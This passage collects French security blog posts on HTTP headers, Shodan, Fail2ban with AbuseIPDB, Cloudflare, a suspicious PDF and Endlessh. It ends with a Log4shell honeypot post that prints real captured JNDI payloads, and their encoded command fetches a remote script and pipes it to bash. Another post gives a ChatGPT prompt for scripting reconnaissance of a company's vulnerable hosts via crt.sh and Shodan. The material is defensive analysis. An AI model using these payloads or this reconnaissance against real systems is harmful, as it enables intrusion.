Bref, à part ajouter ces domaines à ma liste de 169 domaines désavoués sur la Google Search Console, il n'existe pas vraiment de solution automatisée pour combattre des contenus qui ont comme but de déréférencer certains contenus de votre site Web.

Le Dark SEO est donc assez complexe à combattre et peut être très efficace pour pénaliser des sites entiers sur des mots clefs bien classés sur Google Search. Cette activité n'est malheureusement pas juridiquement répréhensible...

Une veille régulière des liens en erreur 404 pointant vers votre site Web est donc un prérequis au bon référencement de celui-ci. Des outils comme Ahrefs ou SemRush peuvent vous y aider en complément de la Search Console de Google, mais il est nécessaire d'y attribuer un budget non négligeable si il s'agit comme moi d'un site personnel.

Je vous avais précédemment présenté une manière de valider facilement la sécurité du SSL de votre site via SSL Labs, voici SecurityHeaders.com un autre outil en ligne complémentaire permettant de valider le bon usage des entêtes HTTP afin de garantir le bon niveau de sécurité de votre site Web.

Les entêtes HTTP permettant de renforcer la sécurité de votre site Internet sont souvent omises car assez peu connues des développeurs. Elles sont pourtant indispensables pour garantir un bon niveau de sécurité de votre site Web.

Le portail SecurityHeaders.io est libre d'utilisation, sans pub et s'inspire fortement du mécanisme de notation de SSL Labs de Qualys.

Il offre une note entre A+ et R en fonction du respect de l'usage des entêtes liés à la sécurité de la norme HTTP.

La note A+ n'est pas simple à obtenir et nécessite un renforcement de tous les aspects de la sécurité.

Les 6 entêtes HTTP les plus simples à positionner et accessibles tous sont les suivantes :

• Strict-Transport-Security
• X-Frame-Options
• X-Content-Type-Options
• X-XSS-Protection
• Referrer-Policy
• Permissions-Policy

Comment configurer des entêtes HTTP sécurisées ?

Ces entêtes HTTP peuvent se configurer tout simplement au travers d'un fichier de configuration sur votre serveur Web.

Dans mon cas j'utilise NGINX comme serveur Web, il dispose de l'instruction "add_header" pour ajouter des entêtes aux réponses HTTP réalisées par mon serveur.

J'ai créé un fichier "/etc/nginx/snippets/security.conf" dans lequel j'ai positionné toutes les optimisations de sécurité pour mes sites Web.
J'ai ensuite réalisé un "include" de ce fichier sur la configuration de mes sites dans le répertoire "site-enabled".

Voici un exemple de configuration simple pour NGINX :

add_header Content-Security-Policy "default-src 'self' 'unsafe-inline';" always;
add_header Strict-Transport-Security 'max-age=31536000; includeSubDomains; preload' always;
add_header X-Frame-Options "SAMEORIGIN" always;
add_header X-Xss-Protection "1; mode=block" always;
add_header X-Content-Type-Options "nosniff" always;
add_header Referrer-Policy "strict-origin" always;
add_header Permissions-Policy "geolocation=(),midi=(),sync-xhr=(),microphone=(),camera=(),magnetometer=(),gyroscope=(),fullscreen=(self),payment=()";

Ce paramétrage est le paramétrage le plus mimimal qui vous permettra de passer les premiers niveaux de tests de sécurité.

Content Security Policy et Public Key Pinning : Deux entêtes plus complexes à configurer

Les entêtes de Content-Security-Policy et de Public-Key-Pins, recommandés par Securityheaders.io, sont les plus complexes à configurer.

D'une part parce que les CSP nécessitent une excellente maîtrise des ressources embarquées sur les pages de votre site, vous devrez détailler méticuleusement tous les domaines Internet qui seront autorisés à intégrer du contenu sur votre site Web. Cela nécessite une phase de test importante des pages de votre site Web car une mauvaise entête CSP pourrait rendre le contenu de votre site illisible et produire des erreurs de sécurité sur les navigateurs de vos visiteurs. Pour vous aider à construire votre règle de CSP, vous pouvez utiliser le plugin "Policy Generator" de csper.io.

Enfin, l'entête "public key pinning", qui permet de se protéger d'attaques via l'utilisation certificats frauduleux émis par des autorités de certification nécessite de bonnes compétences techniques afin de ne pas bloquer le trafic sur votre site. D'autant plus si vous utilisez des certificats Letsencrypt qui sont renouvelés tous les 3 mois ... Enfin, Si comme moi vous utilisez un CDN comme Cloudflare, cette entête HTTP ne peux pas être mise en oeuvre comme l'indique la documentation du produit.

En conclusion

Si vous souhaitez vérifier dès maintenant la sécurité de votre site, l'outil est disponible en ligne à cette adresse : SecurityHeaders.com

N'oubliez pas de décocher la case "Hide result" pour éviter que le résultat de l'audit de votre site soit affiché à l'ensemble des visiteurs de cette plateforme.

Si vous souhaitez aller plus loin dans la sécurisation de votre serveur Web, je vous invite à lire mon article sur le déploiement de Portsentry et Fail2ban.

Vous connaissez Google, connaissez-vous Shodan ?

Shodan n'est certes pas tout jeune sur le Web, créé en 2009 par John Matherly, Shodan scanne en permanence l'ensemble des systèmes connectés sur Internet (serveurs, box internet, routeurs ...) et catalogue l'ensemble des services exposés par ces systèmes dans son moteur de recherche : serveur Web, SSH, RTSP .. etc.

Les résultats collectés par Shodan sont disponibles sur son site Internet et au travers d'API utilisables par des développeurs.

La complétude et la fraicheur des données de Shodan font de lui un acteur clef dans la recherche de vulnérabilités sur Internet.

Quelles sont les informations disponibles sur Shodan ?

Parmi les recherches phares réalisées sur Shodan par la majorité des visiteurs vagabonds, on retrouve deux types de recherche :

• La recherche de caméras sans mot de passe
• La recherche de services avec des mots de passe par défaut

Shodan dispose de nombreux filtres de recherche permettant de rechercher précisément un service, un port au sein d'une ville, d'une organisation ...

La puissance de ces filtres de recherche permet de rechercher n'importe quel type de service sur Internet même pour quelqu'un de néophyte.

Le service qui m'a probablement le plus surpris est la fonctionnalité "Shodan Images" qui permet de visualiser des centaines de milliers d'écrans d'authentification Windows et de caméras pas suffisamment sécurisées.

Des informations accessibles directement depuis son navigateur Web

Son plugin pour Chrome et Firefox permet d'avoir une synthèse des services exposés par le serveur Web sollicité sans quitter son navigateur.

Ce plugin permet d'avoir une synthèse des ports ouverts sur un serveur distant sans lancer un scan de port de type nmap sur le serveur, la donnée est déjà disponible et mise à disposition par Shodan.

Pour les utilisateurs les plus avancés, Shodan est appelable en ligne de commande via Shodan Cli depuis un terminal. Vous trouvez aussi au sein de Metasploit un plugin de recherche Shodan directement intégré.

Comment créer un rapport d'analyse de sécurité avec Shodan ?

Les paramètres de recherche fournis par Shodan permettent de créer des rapports assez poussés comme par exemple le classement des groupes de pirates qui font du defacing de sites Internet :

Comment se protéger de Shodan ?

Si vous avez des serveurs exposés sur Internet, la solution la plus simple consiste à utiliser un outil comme Portsentry pour permettre de blocker dynamiquement les adresses IP qui scannent vos ports.

Sachant que Shodan ne scanne qu'un sous-ensemble de ports, il faudra que Portsentry écoute sur quelques-uns d'entre eux pour pouvoir détecter et bloquer Shodan.

Shodan collects data mostly on web servers (HTTP/HTTPS – ports 80, 8080, 443, 8443), as well as FTP (port 21), SSH (port 22), Telnet (port 23), SNMP (port 161), IMAP (ports 143, or (encrypted) 993), SMTP (port 25), SIP (port 5060), and Real Time Streaming Protocol (RTSP, port 554).

Comment utiliser Shodan comme outil de supervision ?

Si vous êtes une entreprise et que vous souhaitez être alerté à la moindre exposition d'un nouveau service sur vos serveurs, vous pouvez souscrire au service Shodan Monitor qui vous notifiera dès lors qu'un nouveau service est exposé sur un ensemble de plages IP configurables.

Au-delà de la détection du service, Shodan est capable aussi de vous informer des failles connues exposées par les services identifiés, si un certificat SSL est expiré ...

Si vous êtes un particulier, vous pouvez devenir membre pour 49$ seulement. Ce qui vous offre une surveillance gratuite de 20 adresses IP sans coût récurrent.

En conclusion

Vous l'aurez compris, Shodan est un outil à double tranchant, il permet à la fois à des cybercriminels de trouver facilement de cibles sensibles et permet à des équipes de sécurité de faire de la veille et de l'analyse.

Shodan n'est pas un outil gratuit, même si vous pouvez créer un compte et utilisez les API de Shodan gratuitement vous serez très vite bloqués par un mécanisme de quota. Pour augmenter ce quota d'utilisation, vous devrez souscrire à un abonnement.

Si vous êtes bricoleur dans l'âme et si vous possédez une très bonne fibre optique, il est possible de construire son propre Shodan maison avec deux outils tels que Masscan et ElasticSearch. L'outil Scantastic propose d'intégrer les résultats de Masscan directement dans le moteur de recherche Elastic Search pour pouvoir ensuite les exploiter de la même manière que Shodan, adossé au logiciel ElastAlert, vous devriez pouvoir mettre en place une solution de surveillance avancée.

Pour aller plus loin dans la découverte de services sur Internet, je vous recommande la lecture de mon article sur DNSDumpster.

Je suis tombé un peu par hasard sur une nouvelle fonctionnalité de Google One en lisant les annonces de Google. Il s'agit d'un service vérification des fuites de vos données personnelles sur le Dark Web, un peu à la manière de la plateforme Have I been Pwnd que je vous avais présenté il y a quelques années.

Ce service est capable d'analyser la présence de l'ensemble des vos données personnelles : nom, prénom, adresse, téléphone, email sur les dumps de vol données disponibles sur le Dark Web.

La fonctionnalité s'active en quelques secondes et donne des résultats très pertinents immédiatement :

• Nom du site où les données ont fuité
• Informations qui ont fuité
• Début du mot de passe qui a fuité
• ... etc

Voici un exemple de rapport produit par la plateforme Google One :

Bref, si vous avez une licence Google One, je vous invite très fortement à activer ce service tout comme le service de VPN disponible dans l'offre Google One.

En complément de ce service, je vous invite aussi à utiliser un service de protection de vos mots de passe gratuit comme KeepassXC et d'utiliser un mot de passe unique sur chaque service en ligne que vous utilisez. Dès lors que cela est possible, n'hésitez pas à activer le mécanisme de double authentification pour réduire les risques de piratage en cas de fuite de mot de passe.

A très bientôt pour de nouveaux articles.

Google One - Cloud Storage, Automatic Phone Backup, VPN and more

Get more storage for Google Drive, Gmail & Google Photos, access to experts, VPN, and other benefits in a membership that you can share with your family.

Google One

Souvenez vous, je vous avais présenté Fail2ban il y a quelques années déjà et je vous avais parlé d'AbuseIPDB sur mon article autour du HoneyPot Log4shell que j'avais développé pour détecter les payloads transmis par les attaquants exploitant cette vulnérabilité.

À quoi sert Fail2ban ?

En quelques mots, Fail2ban est un logiciel Opensource qui permet d'exécuter des actions automatiques lors détection de patterns au sein de fichiers de logs. Ces actions peuvent être l'envoi d'un email, le blocage d'une adresse IP sur un firewall ou bien dénoncer l'adresse IP identifiée comme malveillante sur une plateforme Crowdsec comme AbuseIPDB par exemple. Il est par défaut configuré avec un grand nombre de filtres et d'actions facilement activables.

Qu'est-ce que AbuseIPDB ?

AbuseIPDB constitue une base de connaissance sur l'ensemble des IP malveillantes autour de la planète. Son usage est gratuit et limité à 5000 rapports d'adresse IP malveillante par jour. Des offres commerciales sont proposées par AbuseIPDB pour bénéficier d'une profondeur de données plus importantes pour les entreprises souhaitant de protéger des IP pouvant constituer un danger.
AbuseIPDB reçoit quasiment 30 000 adresses IP par heure de la part de ses utilisateurs. Cela représente actuellement pas moins de 23 millions d'adresses IP sur les 30 derniers jours.

Comment intégrer Fail2ban à AbuseIPDB ?

Par défaut, Fail2ban possède une action permettant de transmettre une adresse IP malveillante à la plateforme AbuseIPDB. Il est possible d'activer cette action tout simplement en précisant une règle d'action dans les fichiers "Jails" présents dans le répertoire "/etc/fail2ban/jail.d" du système :

[portsentry]
enabled = true

# Ban IP and report to AbuseIPDB for Port Scan
action = %(action_)s
         %(action_abuseipdb)s[abuseipdb_apikey="ee3b04b6sdfec61b4256cfgf975c8feedfc8", abuseipdb_category="14"]

La catégorie doit juste être adaptée à l'attaque reçue. Dans l'exemple ci-dessus, la catégorie 14 correspond à une attaque de type "Port scan" adaptée à une détection faite comme un logiciel comme Portsentry par exemple.

La clef d'API doit être modifiée la clef que vous pourrez obtenir sur la page de votre compte AbuseIPDB.

Comment fonctionne ma configuration ?

Dans un but d'exploration, j'ai configuré Portsentry sur mon serveur pour écouter certains ports stratégiques de mon serveur.
Fail2Ban remonte ensuite à AbuseIPDB une alerte dès lors que des tentatives de connexion réseau sont détectées par Portsentry.

En me limitant à quelques ports sensibles comme le port SMB 445 par exemple, mon serveur arrive à détecter par moins de 1500 adresses IP malveillantes par jour.

Il faut juste être vigilant à ce que la durée de bannissement soit suffisamment longue pour éviter de transmettre plusieurs fois les mêmes adresses IP à AbuseIPDB. Une durée minimale de 60 jours est conseillée par AbuseIPDB pour limiter les envois inutiles de données.

Pour obtenir un message plus digeste sur le commentaire transmis à AbuseIPDB, je vous conseille de revoir la règle actionban dans le fichier sur "/etc/fail2ban/abuseipdb.conf"

actionban = lgm=$(echo "<matches>" | cut -d ':' -f 5); curl -sSf "https://api.abuseipdb.com/api/v2/report" -H "Accept: application/json" -H "Key: <abuseipdb_apikey>" --data-urlencode "comment=Port scanning: $lgm" --data-urlencode "ip=<ip>" --data "categories=<abuseipdb_category>"

Afin d'augmenter les quotas d'appels aux API de la plateforme AbuseIPDB, il est possible d'exposer le badge suivant pour promouvoir le service proposé par la plateforme :

Chaque tentative d'attaque sur mon serveur est ainsi aussitôt déclarée à la communauté AbuseIPDB qui possède une importante connaissance sur les serveurs malveillants de la planète.

Comment renforcer votre Firewall IPTables contre les adresses IP malveillantes ?

Si vous souhaitez profiter des données centralisées par AbuseIPDB pour renforcer la sécurisation de votre infrastructure, il est possible d'utiliser un script Shell disponible sur GitHub pour créer des règles de filtrages IPTables basées sur la liste d'adresses IP malveillantes que AbuseIPDB peut vous partager au travers de son API "Blacklist" :

https://api.abuseipdb.com/api/v2/blacklist

Si la Cybersécurité vous intéresse, n'hésitez pas à aller découvrir mes articles sur Shodan, Kali Linux ou bien Hackthebox. Vous pouvez aussi passer sur le serveur Discord Geeek pour discuter avec des lecteurs aussi passionnés que vous.

Connaissez-vous le Certificate Transparency ? Il s'agit d'un service de cybersécurité permettant de détecter et de prévenir les attaques par certificats non autorisés. Ce mécanisme assure une plus grande protection des données et des informations sensibles des utilisateurs.

Le meilleur schéma détaillant sont fonctionnement est probablement celui du site certificate.transparency.dev qui détaille l'ensemble des flux de la solution de logs distribués.

Ces logs sont consultables auprès de certains sites comme le site de Comodo disponible à l'adresse suivante par exemple : https://crt.sh

Il vous suffit de rentrer le nom de domaine d'une entreprise pour identifier l'exhaustivité des noms de domaines qui utilisent des certificats TLS même si vous avez interdit le transfert de noms de domaines sur votre serveur DNS.

En plus de fournir les noms de domaine, la plateforme détaille l'ensemble des certificats utilisés ainsi que leur date de validité. C'est assez bluffant.

En investiguant de plus près les capacités du site, celui-ci est capable de retourner une réponse en JSON via le paramètre "output=json" et peut être requêté directement via le paramètre "q". Vous commencez à voir où je veux en venir ?

https://crt.sh/?q=www.perdu.com&output=json

Il est pour le coup possible d'appeler ce portail directement depuis un script pour en extraire facilement l'ensemble des domaines et identifier les adresses IP des serveurs au travers d'une simple résolution DNS.

Pour finaliser le script, un simple appel à Shodan.io est possible pour retourner l'ensemble des vulnérabilités connues sur les adresses IP identifiées.

Cette astuce permet d'identifier très rapidement l'ensemble des points d'entrée vulnérables d'une entreprise.

Avec ChatGPT ou le playgroud GPT il est très simple de créer un script dans le langage de votre choix pour automatiser une analyse :

Create a script in Go lang that calls https://crt.sh/?q=domain.com&output=json and parses the JSON response, taking a command line parameter that is the domain name to analyse. For each common name found in the JSON, resolve the IP address behind the domain and call shodan.io to identify the vulnerabilities.

Bref, identifier les vulnérabilités d'un système d'information complexe est désormais accessible à n'importe quel "script kiddie" qui connait https://crt.sh et GPT.

C'est aujourd'hui la 3ème génération de Dedibox que j'utilise depuis le crash de ma précédente Dedibox cet été pour héberger ce blog personnel.

Cette dernière migration m'a permis de supprimer de nombreux sous-domaines inutiles et de faire le ménage dans une majeure partie de la configuration NGINX du serveur qui devenait de plus en plus complexe à maintenir.

J'ai profité de ce nettoyage pour tester l'offre gratuite de Cloudflare, j'ai ainsi basculé l'ensemble de mes sites Web personnels sur cette solution de CDN gratuite.

Quel est le principe du CDN Cloudflare ?

D'après les derniers chiffres partagés par Cloudflare, 20% du trafic Web passe au travers de leurs serveurs. Ces serveurs assurent une mise en cache des contenus Web, optimisent les temps de téléchargement des ressources et vont jusqu'à la compression des ressources statiques.

Si vous souhaitez comprendre plus en détail l'architecture d'un CDN, je vous invite à découvrir l'excellente vidéo de ByteByteGo récemment diffusée sur Youtube :

Cette solution de CDN va me permettre d'économiser des precieuses ressources physiques sur mon serveur Linux et gagner en scalabilité lors des pics de visites.

Au-delà des économies de ressources et de l'augmentation de la scalabilité, Cloudflare permet de renforcer la sécurité d'accès aux ports de mon serveur et d'optimiser le temps de chargement des pages Web du site pour les visiteurs notament grâce à l'utilisation de HTTP/3 & QUIC.

Cette option est disponible depuis l'onglet "network" et permettra de réduire le temps d'affichage de vos pages Web sur des terminaux avec de plus fortes latences réseau.

Quels sont les autres services connus de Cloudflare ?

En plus de son offre de CDN, vous devez probablement connaitre l'adresse IP 1.1.1.1 qui héberge le serveur DNS public de Cloudflare et qui se présente comme 28% plus rapide que les autres solutions de DNS.
C'est notamment le serveur DNS qu'utilise la solution de filtrage parental Adguard que je vous avais présentée il y a quelques mois.

Enfin, pour les développeurs, Cloudflare fournit aussi une plateforme de mise en cache des scripts Javascript : https://cdnjs.com/
La majorité des librairies telles que JQuery, font-awesome, Angular y sont cachées et compressées pour un téléchargement plus rapide.

Comment est réalisé le chiffrement SSL/TLS ?

Le chiffrement du site est assuré de bout en bout. Cloudflare me fournit un certificat pour les navigateurs, mais aussi un pour mon serveur en backend.

Ces certificats sont gérés par Cloudflare, vous pouvez aussi utiliser vos propres certificats à condition de souscrire à l'offre entreprise.

Comment s'est déroulée la migration vers le CDN Cloudflare ?

La migration s'est faite sans difficulté. Vous devez changer les DNS primaires et secondaires de votre nom de domaine au sein de votre "registrar" vers les serveurs DNS de Cloudflare.

Après quelques minutes, Cloudflare valide que vous êtes bien le propriétaire du domaine et vous propose de configurer les options disponibles.

La seconde étape est de remplacer les certificats SSL de votre serveur par ceux proposés gratuitement par Cloudflare dans l'onglet "SSL/TLS -> Origin Server".
Une fois votre service Web redémarré, vous pouvez passer au mode strict au niveau du profil de sécurité pour éviter toute attaque de type MITM.

Pour tester le bon fonctionnement de la migration, vous pouvez purger le DNS de votre PC / Mac et vérifier que votre site Internet s'affiche toujours dans votre Navigateur. Si une erreur de certificat s'affiche, il est possible que la modification de DNS prenne quelques minutes en fonction des TTL positionnés sur les serveurs intermédiaires. Dans ce cas, vous pouvez toujours forcer le changement de DNS manuellement le temps que la réplication soit réalisée.

Quels sont les points de vigilance au niveau de la configuration du CDN ?

Par défaut, Cloudflare va exploiter les entêtes de mise en cache des ressources qui lui sont transmises. Si ces entêtes HTTP ne sont pas correctes, Cloudflare peut potentiellement mettre en cache des ressources qui ne devraient pas l'être.

Vous devez donc ajouter des règles de bypass du cache sur les URL sur lesquelles vous savez qu'un cache est risqué et inutile. Dans le cadre du CMS Ghost, il est conseillé d'exclure le portail d'administration du cache du CDN au travers d'une règle dédiée.

Comment renforcer la sécurité de votre serveur Web après la migration ?

Maintenant que votre serveur Web doit communiquer uniquement avec le CDN, vous pouvez modifier votre firewall pour autoriser uniquement la communication des serveurs Cloudflare avec votre serveur Web.

Pour simplifier cette tâche, il existe un script shell capable de récupérer dynamiquement la liste des serveurs Cloudflare et d'appliquer des règles de filtrage sur le firewall de votre serveur.

Voici un exemple de script développé David Manouchehri par et disponible sur Github :

# Source:
# https://www.cloudflare.com/ips
# https://support.cloudflare.com/hc/en-us/articles/200169166-How-do-I-whitelist-CloudFlare-s-IP-addresses-in-iptables-

for i in `curl https://www.cloudflare.com/ips-v4`; do iptables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done
for i in `curl https://www.cloudflare.com/ips-v6`; do ip6tables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done

# Avoid racking up billing/attacks
# WARNING: If you get attacked and CloudFlare drops you, your site(s) will be unreachable. 
iptables -A INPUT -p tcp -m multiport --dports http,https -j DROP
ip6tables -A INPUT -p tcp -m multiport --dports http,https -j DROP

En conclusion

Cette migration m'a pris au total deux soirées, j'ai été clairement surpris de la simplicité d'utilisation du service. Je verrai dans un second temps si l'offre PRO est nécessaire pour Geeek.org qui est actuellement le site sur lequel j'ai le plus de visiteurs.

L'utilisation du CDN me permet à priori d'économiser plus de 90% de la bande passante de mon serveur Linux et de le protéger contre des attaques / robots malveillants.

L'inconvénient du CDN concerne son niveau de disponibilité. En cas de crash majeur, l'ensemble des sites qu'il proxifie seront indisponibles sur le Web.

Vous souhaitez discuter CDN ? Je vous invite à passer dire "bonjour" sur le serveur Discord Geeek.

*Remarque : Cet article n'est pas sponsorisé *

Suite la quantité de vulnérabilités zéro day exploitées sur le lecteur PDF Adobe Reader, je ne donne plus aucune confiance aux fichiers PDF reçus par email ou trouvés sur le Web.

J'ai très récemment reçu plusieurs emails faisant de la publicité pour la marque Boulanger et ressemblant à de l'hameçonnage. Les emails provenaient d'un domaine Firebase de chez Google.

Ces emails contenaient un contenu m'indiquant le gain d'un lot dans lequel était adjoint un PDF vraiment très étrange.

Après les avoir analysé ces fichiers avec la plateforme VirusTotal, ceux-ci semblent contenir aucune vulnérabilité connue. L'ensemble des antivirus attachés à la plateforme n'ont rien trouvé de convaincant.

Je ne suis à priori pas le seul à avoir analysé le contenu du fichier, mais je reste étonné que personne n'ait remonté un éventuel problème.

En investiguant le contenu du PDF avec l'outil pdf-parser disponible sur Kali Linux, on se rend compte que le fichier contient pas moins de 5083 commentaires et absolument rien d'autre. Mes soupçons se confirment.

$ pdf-parser -a u4hsme47mlar276boqzz.pdf

Comment: 5083
XREF: 0
Trailer: 0
StartXref: 0
Indirect object: 0

En analysant maintenant le contenu des commentaires, ceux-ci sont constitués uniquement de caractères en hexadécimal. Tout cela ne sent pas bon du tout !

PDF Comment '%\xbd\xda7\x0b\n'

Contre toute attente, chaque ligne de commentaire se termine soit par un "\n" ou un "\r".

En détaillant le contenu du PDF, les 5083 commentaires sont en fait 130 lignes de commentaires répété plusieurs fois au sein du fichier.

Nom de Zeus ! Cela ressemble très fortement à une attaque de type Buffer Overflow autour de l'interprétation des caractères "Cariage return" ou je me trompe ?

Les caractères en hexadécimal ne seraient-ils pas tout simplement de l'assembleur ?

Petit passage du le Discord Geeek, je demande à la communauté sur le canal #cybersecurité pour avoir un avis. Spawnrider lance une analyse avec Capstone.

L'extraction des commentaires produit un résultat plutôt intéressant qui pourrait confirmer qu'il s'agit bien d'une attaque utilisant l'exploitation d'un buffer overflow :

0x0: pop esp
0x1: js 0x64
0x3: aaa 
0x4: pop esp
0x5: js 0x69
0x7: xor eax, 0x3964785c
0xc: pop esp
0xd: js 0x73
0xf: aaa 
0x10: pop esp
0x11: js 0x76
0x13: xor byte ptr [edi + 0x5c], dl
0x16: js 0x7b
0x18: pop esp
0x1a: js 0x4c
0x1c: cmp byte ptr [ecx + 0x5c], ch
0x1f: js 0x52
0x21: xor eax, 0x66785c20
0x26: bound ebx, qword ptr [eax + edi*2 + 0x38]
0x2a: cmp byte ptr [eax + edi*2 + 0x65], bl
0x2e: cmp dword ptr [eax + edi*2 + 0x38], ebx
0x32: bound ebx, qword ptr [eax + edi*2 + 0x62]
0x36: pop esp
0x38: js 0x6b
0x3a: cmp dword ptr [eax + edi*2 + 0x39], ebx
0x3e: cmp dword ptr [ecx + 0x2a], esi
0x41: pop esp
0x42: js 0x7d
0x44: cmp dword ptr [edx + 0x5c], eax
0x47: js 0xac
0x49: pop sp
0x4b: js 0xb1
0x4d: sub al, 0x5c
0x50: js 0xb6
0x52: pop esp
0x54: js 0xbc
0x56: xor bl, byte ptr [eax + edi*2 + 0x66]
0x5a: xor bl, byte ptr [eax + edi*2 + 0x39]
0x5e: xor dword ptr [esp + ebx*2 + 0x5c], ebx
0x62: js 0xc5
0x64: pop esp
0x66: js 0xca
0x68: popal 

Il reste maintenant à comprendre quel lecteur de PDF est ciblé. S'agit-il d'Adobe Reader, de Edge ou bien d'un lecteur PDF sur Android ou iOS ?
Pourquoi le fichier n'est pas détecté par un Antivirus ?
Que se produit-il sur le périphérique une fois le fichier ouvert ?

Je n'irai pas plus loin pour cette fois-ci. En attendant, faites très attention aux PDF que vous recevez ! N'ouvrez aucun fichier transmis par un inconnu.

Pour continuez la discussion, rejoignez le canal #cybersécurité sur le serveur Discord Geeek.

Si vous avez un serveur Linux avec un port SSH exposé sur Internet, vous avez probablement pu constater que celui-ci était en permanence attaqué par des tentatives d'attaque de type force brute utilisant des listes de mots de passe communs.

Comment se protéger des attaques SSH par Bruteforce ?

Pour remédier à ces tentatives attaques, vous avez plusieurs possibilités :

• La première consiste tout simplement à filtrer les adresses IP pouvant accéder au serveur SSH uniquement à une liste d'IP connues (IP box, IP VPN ...).
• La seconde consiste à mettre en place le logiciel Fail2ban pour bannir automatiquement les attaquants après 3 ou 4 tentatives infructueuses d'authentification.
• La troisième est d'utiliser une authentification à base de certificat.
• La dernière consiste à déplacer votre serveur SSH sur un autre port plus exotique et de déployer le logiciel Endless SSH sur le port 22 (ou Portsentry)

Et si vous êtes un paranoïaque de sécurité informatique, vous pouvez aussi réaliser ces 4 solutions.

Comment fonctionne Endlessh ?

Endlessh est un logiciel très simpliste qui expose un faux serveur SSH avec une bannière d'une longueur infinie qui n'offre aucun prompt d'authentification au client du service.

Cette bannière infinie et générée sur la base de caractères aléatoires bloquera les clients SSH qui essaient de vous attaquer. Ces clients attendront pendant plusieurs heures ou jours un prompt d'authentification du service.

Si le logiciel de l'attaquant ne prend en compte de timeout, Endlessh vous permettra d'emmerder tout simplement les personnes qui réalisent des bruteforces SSH sur Internet, et ils sont nombreux ...

Comment installer Endlessh ?

Endlessh est un simple code C de 800 lignes. Un "make" vous permettra de construire le binaire après un git clone du repository GitHub.

Pour installer Endlessh sous forme de service Linux, le projet Endlessh sur Github dispose d'un template de service vous permettant de démarrer automatiquement Endlessh à chaque redémarrage de serveur.

Si vous lancez le binaire en ligne de commande, les options de lancement sont simplistes :

Usage: endlessh [-vhs] [-d MS] [-f CONFIG] [-l LEN] [-m LIMIT] [-p PORT]
  -4        Bind to IPv4 only
  -6        Bind to IPv6 only
  -d INT    Message millisecond delay [10000]
  -f        Set and load config file [/etc/endlessh/config]
  -h        Print this help message and exit
  -l INT    Maximum banner line length (3-255) [32]
  -m INT    Maximum number of clients [4096]
  -p INT    Listening port [2222]
  -s        Print diagnostics to syslog instead of standard output
  -v        Print diagnostics (repeatable)

Voici ma découverte du week-end. N'hésitez pas à rejoindre le serveur Discord Geeek pour venir discuter Cybersécurité avec la communauté Geeek.

Vous avez probablement déjà dû entendre l'annonce des différentes failles de sécurité découvertes autour de la librairie Java Log4J ?

Je ne vais pas revenir sur cette faille majeure qui permet très facilement à un hacker d'injecter du code malveillant dans une application Java. La faille découverte est très critique et remet en question la sécurité de nombreux systèmes d'information utilisant des middlewares Java utilisant la librairie Log4J comme solution de journalisation.

Suite à l'annonce de cette faille, j'ai développé le week-end dernier un HoneyPot (Pot de miel) capable d'intercepter des attaques Log4shell et de les journaliser afin de permettre :

• D'analyser la structure des requêtes HTTP des tentatives d'attaques.
• De mieux comprendre la structure des scripts malveillants provenant de botnets exploitant cette faille.
• De suivre l'évolution de l'exploitation de cette faille sur Internet.

Mon HoneyPot Log4shell en PHP

Pour gagner du temps, j'ai développé un HoneyPot Log4shell en PHP minimaliste capable d'analyser la présence du caractère "dollar" dans tous les champs des requêtes HTTP entrantes sur le serveur. Je le reconnais, cette approche est simpliste, mais très efficace et ce script a comme avantage de détecter toutes les tentatives d'obfuscation.

Configuration du serveur Web

Les attaques de botnets se faisant principalement via des scans de plages d'adresses IP, pour que ce script soit opérationnel, il faut donc qu'il soit déployé dans le vhost par défaut d'un serveur Web et qu'il réponde à toutes les requêtes entrantes sur l'adresse IP publique du serveur http://x.x.x.x

Cela peut se faire sur Nginx au travers de la commande "default_server".
En complément, pour que le script puisse répondre à toutes les requêtes, une instruction "try_files" permet de transmettre au script PHP toutes les requêtes HTTP infructueuses afin de capturer toutes les tentatives d'attaque sur des chemins autres que la racine.

server {
        listen 80 default_server;
        root /var/www/default/public_html/;
        
        location / {
                try_files $uri $uri/ /index.php?$args;
        }
}

Mes résultats après plusieurs jours d'écoute

Contre toute attente, j'ai reçu assez peu de tentatives d'intrusions. Au total j'ai recensé 3 adresses IP différentes ayant essayé de s'introduire sur mon serveur au travers de la faille Log4shell.

Cela signifie que l'exploitation de la faille Log4shell n'est pas encore largement exploitée par des botnets sur la toile. Le cas échéant, mon serveur aurait capturé beaucoup plus de tentatives provenant d'adresses IP différentes ...

Le premier attaquant Russe

Je reçois des tentatives d'attaques journalières provenant d'un serveur russe blacklisté sur AbuseIPDb.

Voici les logs obtenus par mon HoneyPot :

195.54.160.x:HTTP_REFERER:http://163.172.58.13:80/?x=${jndi:ldap://195.54.160.x:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjMuMTcyLjU4LjEzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2My4xNzIuNTguMTM6ODApfGJhc2g=}

195.54.160.x:HTTP_USER_AGENT:${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.x:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjMuMTcyLjU4LjEzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2My4xNzIuNTguMTM6ODApfGJhc2g=}

195.54.160.x:QUERY_STRING:x=${jndi:ldap://195.54.160.x:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjMuMTcyLjU4LjEzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2My4xNzIuNTguMTM6ODApfGJhc2g=}

L'attaquant a utilisé différentes méthodes d'injection avec différents modes d'obfuscation :

• L'utilisation des entêtes Referer, User-Agent.
• L'utilisation d'un argument en query string avec une variable "x" dans l'URL.

Son attaque passe par l'exécution d'un code Java prenant en paramètre un shellcode configurable à la volée.

Lors de chaque attaque, son serveur LDAP retourne une entrée avec un code Java différent à chaque tentative (javaFactory). Cependant, je n'arrive pas à télécharger la classe générée depuis le serveur qu'il expose sur son port 9999 ...

